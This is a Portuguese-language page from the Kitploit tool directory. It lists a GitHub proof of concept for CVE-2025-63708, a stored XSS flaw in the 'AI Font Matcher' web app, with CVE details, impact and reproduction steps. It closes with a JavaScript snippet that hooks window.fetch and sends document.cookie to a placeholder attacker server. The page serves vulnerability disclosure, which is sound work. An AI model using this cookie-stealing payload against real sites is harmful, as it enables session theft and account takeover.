Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-63708 — Prova de conceito de exploit para CVE-2025-63708, uma vulnerabilidade de XSS armazenado no AI Font Matcher. Demonstra roubo de cookies de sessão através de nomes de família de fonte não sanitizados em respostas de fetch de webfonts. | Kitploit
Ferramentas/GitHubGitHub/dylandavis1/cve-2025-63708
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubdylandavis1/cve-2025-63708

CVE-2025-63708

Prova de conceito de exploit para CVE-2025-63708, uma vulnerabilidade de XSS armazenado no AI Font Matcher. Demonstra roubo de cookies de sessão através de nomes de família de fonte não sanitizados em respostas de fetch de webfonts.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 8 mesesAinda não revisado

CVE-2025-63708

ID CVE: CVE-2025-63708
Atribuído: 11-12-2025
Tipo de Problema: CWE-79 (Cross-Site Scripting)
Produto Afetado: “AI Font Matcher” (publicado em 2025-10-10, nid=18425)
Página do Produto: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
Data da Descoberta: 2025-10-11
Pesquisador: Dylan Davis

Resumo

A aplicação processa dados de uma requisição webfonts sem sanitizar os nomes das famílias de fontes. Um atacante que controle ou intercepte essa resposta pode injetar JavaScript que é executado no contexto da página, permitindo o roubo de cookies de sessão e a tomada de contas.

Impacto

  • Execução arbitrária de JavaScript no navegador da vítima
  • Exfiltração de cookies de sessão (durante meus testes, observei cookies não-HttpOnly)
  • Sequestro de conta e ações realizadas em nome do usuário

Versões Afetadas / Escopo

  • O pacote “AI Font Matcher” distribuído no SourceCodester a partir de 2025-10-10.

Reprodução (PoC)

Este PoC demonstra a execução de código interceptando window.fetch e retornando um payload controlado de Web Fonts.

  1. Execute o aplicativo localmente a partir do código-fonte baixado.
  2. Abra DevTools → Console e cole o PoC abaixo (ou carregue poc.js).
  3. Acione a UI que faz a requisição a webfonts; observe um alert(1).
root@kitploit:~
window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
    const url = (typeof input === 'string') ? input : input?.url;
    if (url && url.includes('webfonts')) {
        // Exfiltrate cookie to your server
        fetch('http://[your-ip]:8001/steal?cookie=' + 
              encodeURIComponent(document.cookie))
            .catch(e => console.log('Exfil failed:', e));
        
        return new Response(JSON.stringify({
            kind: "webfonts#webfontList",
            items: [{ family: "Playfair Display", category: "serif" }]
        }), {
            status: 200, 
            headers: {'Content-Type': 'application/json'}
        });
    }
    return window.__origFetch.apply(this, arguments);
};
Baixar ferramenta